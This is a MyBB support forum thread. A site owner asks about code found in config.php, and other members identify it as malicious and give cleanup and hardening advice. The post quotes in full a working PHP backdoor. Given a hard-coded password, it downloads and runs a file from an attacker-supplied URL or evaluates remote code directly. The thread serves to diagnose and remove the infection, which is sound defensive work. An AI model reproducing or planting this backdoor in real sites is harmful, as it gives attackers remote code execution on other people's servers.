MyBB Community Forums

I found the following code starting on line 2119 and ending on line 2141 in my config.php file should it be there and what does it do?

if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == 'ee188463935a061dee6df8bf449cb882'){
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}

Delete it immediately! It is common malicious code found in config.php. Because you are done with installation, chmod config.php to 444 after removing the Malicous code.
Are you running version 1.6.5? If not, you should upgrade. If you are on 1.6.4, make sure you have patched the 1.6.4 security vulnerability. IIRC, it is related to this exploit. http://blog.mybb.com/2011/10/06/1-6-4-se...nerabilit/
Run file verification in the ACP too.

Deleted, what does it do?

That's not normal. Delete it immediately.

It should look somewhat like this: [wiki]inc/config.php[/wiki]

Also, run File Verification on your ACP>Tools & Maintenance.

EDIT: It's a malicious script. It seems to save a file to your server. Check your folders for a file with a name that's a jumble of letters and numbers.

(2012-01-15, 03:12 AM)markwesley Wrote: [ -> ]Deleted, what does it do?

It is exploit code. I don't remember exactly, but it has to do with a cURL request to a malicious web page, I think.

File verification returns normal , no corrupt files, I'll check it in the morning it's gone 3am here and I'm tired.

---

I could PM someone User details if they want to take a look?

As long as that code is removed, file verification returns normal, and you are at mybb 1.6.5, you should be okay.
Make sure config.php is CHMODded to 444. It will need 644 on upgrade, but not until then.

I don't understand what your saying, I'm tired I've looked for a weird file and can't see one .

File verification won't show anything because it doesn't change other files, it creates a new one. You'll need to go though your files via FTP or cPanel file manager.

You could also check your site through Sucuri: http://sitecheck.sucuri.net/scanner/

CHMOD inc/config.php to 444.
Are you running MyBB 1.6.5? Because there was a 1.6.4 exploit in index.php that allowed modification of files such as config.php